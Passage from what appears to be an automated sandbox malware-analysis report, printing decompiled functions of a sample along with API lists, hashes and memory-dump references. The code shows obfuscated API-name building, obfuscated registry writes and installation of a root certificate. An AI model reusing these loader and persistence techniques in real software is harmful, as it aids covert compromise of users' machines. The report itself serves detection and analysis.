                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
                                                                                                                                                                  • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                                  • API String ID: 4217122820-3199432782
                                                                                                                                                                  • Opcode ID: 61382ec7c30945e40de5d5d355ef1e38b88686b682c74bce4878c4b6ed492f30
                                                                                                                                                                  • Instruction ID: 4738cdeff98adf356a40d86ea9c859c28883a0bba5c886e8c8a368019e3440a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 61382ec7c30945e40de5d5d355ef1e38b88686b682c74bce4878c4b6ed492f30
                                                                                                                                                                  • Instruction Fuzzy Hash: 7212CD70D082E8DAEB21CB64CC58BDEBFB56B16704F0440C9D54C6A282D7BA5B98CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0042735B, Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 330filememoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E0042735B() {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				intOrPtr _v62;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				short _v363;
				char _v367;
				char _v371;
				char _v375;
				char _v379;
				char _v380;
				char _v416;
				char _v436;
				char _v442;
				char _v443;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v454;
				char _v455;
				char _v456;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				signed int _t123;
				void* _t124;
				void* _t126;
				void* _t128;

				_v436 = 0;
				_v416 = 0;
				_v380 = 0;
				_t123 = 0;
				_v379 = 0;
				_v375 = 0;
				_v371 = 0;
				_v367 = 0;
				_v363 = 0;
				_v361 = 0;
				_v496 = 0x56;
				_v495 = 0x69;
				_v494 = 0x72;
				_v493 = 0x74;
				_v492 = 0x75;
				_v491 = 0x61;
				_v490 = 0x6c;
				_v489 = 0x41;
				while(1) {
					_t124 = _t124 + 1;
					_t128 = _t124;
					_v488 = 0x6c;
					_v487 = 0x6c;
					_v486 = 0x6f;
					_v485 = 0x63;
					_v484 = 0;
					_v456 = 0x56;
					_v455 = 0x69;
					_v454 = 0x72;
					while(_t128 >= 0) {
						asm("invalid");
						_push( *((intOrPtr*)(_t126 + _t123 * 8 - 0x7b)));
						_t123 = _t123 + 1;
						asm("invalid");
						_push(_v62);
						asm("invalid");
						asm("popad");
						_v450 = 0x6c;
						_v449 = 0x50;
						_v448 = 0x72;
						_v447 = 0x6f;
						_v446 = 0x74;
						asm("invalid");
						if(( *(_t126 - 2) & _t123) == 0) {
							continue;
						}
						asm("invalid");
						 *[gs:ebp-0x1b8] = 0x63;
						_v443 = 0x74;
						_v442 = 0;
						_v24 = 0x47;
						_v23 = 0x65;
						_v22 = 0x74;
						_v21 = 0x4d;
						_v20 = 0x6f;
						_v19 = 0x64;
						_v18 = 0x75;
						_v17 = 0x6c;
						_v16 = 0x65;
						_v15 = 0x46;
						_v14 = 0x69;
						_v13 = 0x6c;
						_v12 = 0x65;
						_v11 = 0x4e;
						_v10 = 0x61;
						_v9 = 0x6d;
						_v8 = 0x65;
						_v7 = 0x41;
						_v6 = 0;
						_v472 = 0x43;
						_v471 = 0x72;
						_v470 = 0x65;
						_v469 = 0x61;
						_v468 = 0x74;
						_v467 = 0x65;
						_v466 = 0x46;
						_v465 = 0x69;
						_v464 = 0x6c;
						_v463 = 0x65;
						_v462 = 0x41;
						_v461 = 0;
						_v360 = 0x47;
						_v359 = 0x65;
						_v358 = 0x74;
						_v357 = 0x46;
						_v356 = 0x69;
						_v355 = 0x6c;
						_v354 = 0x65;
						_v353 = 0x53;
						_v352 = 0x69;
						_v351 = 0x7a;
						_v350 = 0x65;
						_v349 = 0;
						_v36 = 0x52;
						_v35 = 0x65;
						_v34 = 0x61;
						_v33 = 0x64;
						_v32 = 0x46;
						_v31 = 0x69;
						_v30 = 0x6c;
						_v29 = 0x65;
						_v28 = 0;
						_v328 = 0x43;
						_v327 = 0x6c;
						_v326 = 0x6f;
						_v325 = 0x73;
						_v324 = 0x65;
						_v323 = 0x48;
						_v322 = 0x61;
						_v321 = 0x6e;
						_v320 = 0x64;
						_v319 = 0x6c;
						_v318 = 0x65;
						_v317 = 0;
						_v348 = 0x47;
						_v347 = 0x65;
						_v346 = 0x74;
						_v345 = 0x4c;
						 *((intOrPtr*)(_t126 + _t123 * 8 - 0x7b)) =  *((intOrPtr*)(_t126 + _t123 * 8 - 0x7b)) - 1;
						asm("lodsb");
						asm("invalid");
						goto ( *((intOrPtr*)(_t124 - 0x3a)));
					}
				}
			}












































































































                                                                                                                                                                  0x00427364
                                                                                                                                                                  0x0042736e
                                                                                                                                                                  0x00427378
                                                                                                                                                                  0x0042737f
                                                                                                                                                                  0x00427381
                                                                                                                                                                  0x00427387
                                                                                                                                                                  0x0042738d
                                                                                                                                                                  0x00427393
                                                                                                                                                                  0x00427399
                                                                                                                                                                  0x004273a0
                                                                                                                                                                  0x004273a6
                                                                                                                                                                  0x004273ad
                                                                                                                                                                  0x004273b4
                                                                                                                                                                  0x004273bb
                                                                                                                                                                  0x004273c2
                                                                                                                                                                  0x004273c9
                                                                                                                                                                  0x004273d0
                                                                                                                                                                  0x004273d7
                                                                                                                                                                  0x004273dd
                                                                                                                                                                  0x004273dd
                                                                                                                                                                  0x004273dd
                                                                                                                                                                  0x004273de
                                                                                                                                                                  0x004273e5
                                                                                                                                                                  0x004273ec
                                                                                                                                                                  0x004273f3
                                                                                                                                                                  0x004273fa
                                                                                                                                                                  0x00427401
                                                                                                                                                                  0x00427408
                                                                                                                                                                  0x0042740f
                                                                                                                                                                  0x00427415
                                                                                                                                                                  0x00427419
                                                                                                                                                                  0x0042741b
                                                                                                                                                                  0x0042741f
                                                                                                                                                                  0x00427420
                                                                                                                                                                  0x00427422
                                                                                                                                                                  0x00427428
                                                                                                                                                                  0x0042742a
                                                                                                                                                                  0x0042742b
                                                                                                                                                                  0x00427432
                                                                                                                                                                  0x00427439
                                                                                                                                                                  0x00427440
                                                                                                                                                                  0x00427447
                                                                                                                                                                  0x0042744b
                                                                                                                                                                  0x0042744d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00427452
                                                                                                                                                                  0x00427454
                                                                                                                                                                  0x0042745c
                                                                                                                                                                  0x00427463
                                                                                                                                                                  0x0042746a
                                                                                                                                                                  0x0042746e
                                                                                                                                                                  0x00427472
                                                                                                                                                                  0x00427476
                                                                                                                                                                  0x0042747a
                                                                                                                                                                  0x0042747e
                                                                                                                                                                  0x00427482
                                                                                                                                                                  0x00427486
                                                                                                                                                                  0x0042748a
                                                                                                                                                                  0x0042748e
                                                                                                                                                                  0x00427492
                                                                                                                                                                  0x00427496
                                                                                                                                                                  0x0042749a
                                                                                                                                                                  0x0042749e
                                                                                                                                                                  0x004274a2
                                                                                                                                                                  0x004274a6
                                                                                                                                                                  0x004274aa
                                                                                                                                                                  0x004274ae
                                                                                                                                                                  0x004274b2
                                                                                                                                                                  0x004274b6
                                                                                                                                                                  0x004274bd
                                                                                                                                                                  0x004274c4
                                                                                                                                                                  0x004274cb
                                                                                                                                                                  0x004274d2
                                                                                                                                                                  0x004274d9
                                                                                                                                                                  0x004274e0
                                                                                                                                                                  0x004274e7
                                                                                                                                                                  0x004274ee
                                                                                                                                                                  0x004274f5
                                                                                                                                                                  0x004274fc
                                                                                                                                                                  0x00427503
                                                                                                                                                                  0x0042750a
                                                                                                                                                                  0x00427511
                                                                                                                                                                  0x00427518
                                                                                                                                                                  0x0042751f
                                                                                                                                                                  0x00427526
                                                                                                                                                                  0x0042752d
                                                                                                                                                                  0x00427534
                                                                                                                                                                  0x0042753b
                                                                                                                                                                  0x00427542
                                                                                                                                                                  0x00427549
                                                                                                                                                                  0x00427550
                                                                                                                                                                  0x00427557
                                                                                                                                                                  0x0042755e
                                                                                                                                                                  0x00427562
                                                                                                                                                                  0x00427566
                                                                                                                                                                  0x0042756a
                                                                                                                                                                  0x0042756e
                                                                                                                                                                  0x00427572
                                                                                                                                                                  0x00427576
                                                                                                                                                                  0x0042757a
                                                                                                                                                                  0x0042757e
                                                                                                                                                                  0x00427582
                                                                                                                                                                  0x00427589
                                                                                                                                                                  0x00427590
                                                                                                                                                                  0x00427597
                                                                                                                                                                  0x0042759e
                                                                                                                                                                  0x004275a5
                                                                                                                                                                  0x004275ac
                                                                                                                                                                  0x004275b3
                                                                                                                                                                  0x004275ba
                                                                                                                                                                  0x004275c1
                                                                                                                                                                  0x004275c8
                                                                                                                                                                  0x004275cf
                                                                                                                                                                  0x004275d6
                                                                                                                                                                  0x004275dd
                                                                                                                                                                  0x004275e4
                                                                                                                                                                  0x004275eb
                                                                                                                                                                  0x004275f0
                                                                                                                                                                  0x004275f4
                                                                                                                                                                  0x004275f5
                                                                                                                                                                  0x004275f7
                                                                                                                                                                  0x004275f7
                                                                                                                                                                  0x00427415

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00427847
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0042787E
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004278B7
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004278D0
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0042790D
                                                                                                                                                                  • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004279A8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
                                                                                                                                                                  • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                                  • API String ID: 4217122820-3199432782
                                                                                                                                                                  • Opcode ID: f8e91b6749a88eec4c67123bde6ff338c6db101b99990a9636a9dd143768a118
                                                                                                                                                                  • Instruction ID: 5d358df8297e2d17d1f90c08a807d3f05b33b7c0464408bf91c0e12edbe6f424
                                                                                                                                                                  • Opcode Fuzzy Hash: f8e91b6749a88eec4c67123bde6ff338c6db101b99990a9636a9dd143768a118
                                                                                                                                                                  • Instruction Fuzzy Hash: 3512BC70D082E8DAEB21CB64CC58BDEBFB56F16704F0440C9D54C6A282D7BA5B98CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000E96E, Relevance: 25.6, APIs: 17, Instructions: 90memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E1000E96E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033548c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10335494 = (_t20 << 8) + _t39;
						 *0x10335498 = _t20;
						 *0x1033549c = _t39;
						 *0x10335490 = _t47;
						_t21 = E1000F81F(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E10011936(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E100150E1();
								 *0x10338f64 = GetCommandLineA();
								 *0x103352fc = E10014FAC(); // executed
								_t27 = E100149F4(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014EF3(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014C34();
										goto L10;
									} else {
										_t32 = E10014C80(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E10011BD6(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103352f8 =  *0x103352f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E10011620();
									goto L8;
								}
							} else {
								L8:
								E1000F879();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}



















                                                                                                                                                                  0x1000e96e
                                                                                                                                                                  0x1000e985
                                                                                                                                                                  0x1000e989
                                                                                                                                                                  0x1000e993
                                                                                                                                                                  0x1000e995
                                                                                                                                                                  0x1000e99b
                                                                                                                                                                  0x1000e99d
                                                                                                                                                                  0x1000e99e
                                                                                                                                                                  0x1000e9a0
                                                                                                                                                                  0x1000e9b3
                                                                                                                                                                  0x1000e9b9
                                                                                                                                                                  0x1000e9bf
                                                                                                                                                                  0x1000e9c2
                                                                                                                                                                  0x1000e9cb
                                                                                                                                                                  0x1000e9d1
                                                                                                                                                                  0x1000e9d4
                                                                                                                                                                  0x1000e9d7
                                                                                                                                                                  0x1000e9d9
                                                                                                                                                                  0x1000e9d9
                                                                                                                                                                  0x1000e9d9
                                                                                                                                                                  0x1000e9df
                                                                                                                                                                  0x1000e9e2
                                                                                                                                                                  0x1000e9e7
                                                                                                                                                                  0x1000e9ef
                                                                                                                                                                  0x1000e9f3
                                                                                                                                                                  0x1000e9f9
                                                                                                                                                                  0x1000e9fe
                                                                                                                                                                  0x1000ea04
                                                                                                                                                                  0x1000ea0a
                                                                                                                                                                  0x1000ea0f
                                                                                                                                                                  0x1000ea11
                                                                                                                                                                  0x1000ea12
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea18
                                                                                                                                                                  0x1000ea18
                                                                                                                                                                  0x1000ea1d
                                                                                                                                                                  0x1000ea1f
                                                                                                                                                                  0x1000ea2b
                                                                                                                                                                  0x1000ea36
                                                                                                                                                                  0x1000ea40
                                                                                                                                                                  0x1000ea45
                                                                                                                                                                  0x1000ea4a
                                                                                                                                                                  0x1000ea4c
                                                                                                                                                                  0x1000ea55
                                                                                                                                                                  0x1000ea5a
                                                                                                                                                                  0x1000ea5c
                                                                                                                                                                  0x1000ea7e
                                                                                                                                                                  0x1000ea7e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea5e
                                                                                                                                                                  0x1000ea5e
                                                                                                                                                                  0x1000ea63
                                                                                                                                                                  0x1000ea65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea67
                                                                                                                                                                  0x1000ea69
                                                                                                                                                                  0x1000ea6e
                                                                                                                                                                  0x1000ea71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea73
                                                                                                                                                                  0x1000ea73
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000ea71
                                                                                                                                                                  0x1000ea65
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea1f
                                                                                                                                                                  0x1000e9a2
                                                                                                                                                                  0x1000e9a5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000e9a5
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000eb31

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2870529951-0
                                                                                                                                                                  • Opcode ID: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
                                                                                                                                                                  • Instruction ID: 8b665d2d90db9d313c13c33d8a46f5d936d5b37bcfbd2c7c3b96e787307a2e84
                                                                                                                                                                  • Opcode Fuzzy Hash: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 4731C875A043518FF350DFB58DC161A37E8FF49381F228429E909DB256EB30EC818B51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001FA90, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E1001FA90(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t57;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF80(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0); // executed
				E1000CDB3( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF80(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CDB3( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF80(_t77,  &_v267, 0, 0x103);
				E1001F9F0(__ebx, _t77, __esi, _t94,  &_v268); // executed
				_t44 = E1001F6E0(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8); // executed
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F6E0(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8); // executed
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F650( &_v532, _t96,  &_v532, _a4, _a8); // executed
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F6E0( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8); // executed
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F6E0(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8); // executed
								_t99 = _t52;
								if(_t52 != 0) {
									_t54 = E1001F650(_a4, _t99,  &_v804, _a4, _a8); // executed
									if(_t54 != 0) {
										_t55 = E1001F780(__ebx, _t77, __esi, _a4, _a8); // executed
										_t101 = _t55;
										if(_t55 != 0) {
											_t57 = E1001F6E0( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8); // executed
											if(_t57 != 0) {
												_v536 = 1;
											}
										}
									}
								}
							}
						}
					}
				}
				return _v536;
			}



















                                                                                                                                                                  0x1001fa90
                                                                                                                                                                  0x1001fa90
                                                                                                                                                                  0x1001fa99
                                                                                                                                                                  0x1001faa3
                                                                                                                                                                  0x1001fab8
                                                                                                                                                                  0x1001facd
                                                                                                                                                                  0x1001fae4
                                                                                                                                                                  0x1001faec
                                                                                                                                                                  0x1001fb01
                                                                                                                                                                  0x1001fb16
                                                                                                                                                                  0x1001fb2d
                                                                                                                                                                  0x1001fb35
                                                                                                                                                                  0x1001fb4a
                                                                                                                                                                  0x1001fb59
                                                                                                                                                                  0x1001fb73
                                                                                                                                                                  0x1001fb7b
                                                                                                                                                                  0x1001fb7d
                                                                                                                                                                  0x1001fb95
                                                                                                                                                                  0x1001fb9d
                                                                                                                                                                  0x1001fb9f
                                                                                                                                                                  0x1001fbb4
                                                                                                                                                                  0x1001fbbc
                                                                                                                                                                  0x1001fbbe
                                                                                                                                                                  0x1001fbd6
                                                                                                                                                                  0x1001fbde
                                                                                                                                                                  0x1001fbe0
                                                                                                                                                                  0x1001fbf4
                                                                                                                                                                  0x1001fbfc
                                                                                                                                                                  0x1001fbfe
                                                                                                                                                                  0x1001fc0f
                                                                                                                                                                  0x1001fc19
                                                                                                                                                                  0x1001fc23
                                                                                                                                                                  0x1001fc2b
                                                                                                                                                                  0x1001fc2d
                                                                                                                                                                  0x1001fc43
                                                                                                                                                                  0x1001fc4d
                                                                                                                                                                  0x1001fc4f
                                                                                                                                                                  0x1001fc4f
                                                                                                                                                                  0x1001fc4d
                                                                                                                                                                  0x1001fc2d
                                                                                                                                                                  0x1001fc19
                                                                                                                                                                  0x1001fbfe
                                                                                                                                                                  0x1001fbe0
                                                                                                                                                                  0x1001fbbe
                                                                                                                                                                  0x1001fb9f
                                                                                                                                                                  0x1001fc62

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FAB8
                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FACD
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FAE4
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FB01
                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FB16
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FB2D
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FB4A
                                                                                                                                                                    • Part of subcall function 1001F9F0: _memset.LIBCMT ref: 1001FA0E
                                                                                                                                                                    • Part of subcall function 1001F9F0: _strcat_s.LIBCMT ref: 1001FA41
                                                                                                                                                                    • Part of subcall function 1001F9F0: _sprintf.LIBCMT ref: 1001FA68
                                                                                                                                                                    • Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
                                                                                                                                                                    • Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
                                                                                                                                                                    • Part of subcall function 1001F780: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813
                                                                                                                                                                    • Part of subcall function 1001F780: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
                                                                                                                                                                    • Part of subcall function 1001F780: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
                                                                                                                                                                    • Part of subcall function 1001F780: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
                                                                                                                                                                    • Part of subcall function 1001F780: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FBCC
                                                                                                                                                                  • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FB1C
                                                                                                                                                                  • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB69
                                                                                                                                                                  • \Microsoft\Windows\win_a.dat, xrefs: 1001FAD3
                                                                                                                                                                  • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FBEA
                                                                                                                                                                  • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB8B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                                  • API String ID: 475603772-4188859120
                                                                                                                                                                  • Opcode ID: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
                                                                                                                                                                  • Instruction ID: 4e31c407b2421ecadd55cccd68f5b7507d928531dec073e07e65c36de6934fcb
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
                                                                                                                                                                  • Instruction Fuzzy Hash: BF41577AA00108B7E704DAA0DC46FF9336CDB64344F404098FE1C9A182EB71EB848BA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022D00, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 174COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E10022D00(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v76;
				char _v104;
				char _v132;
				intOrPtr _v136;
				char _v164;
				char _v192;
				char _v220;
				signed int _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				void* __ebp;
				char* _t75;
				intOrPtr _t77;
				void* _t109;
				void* _t110;
				void* _t113;
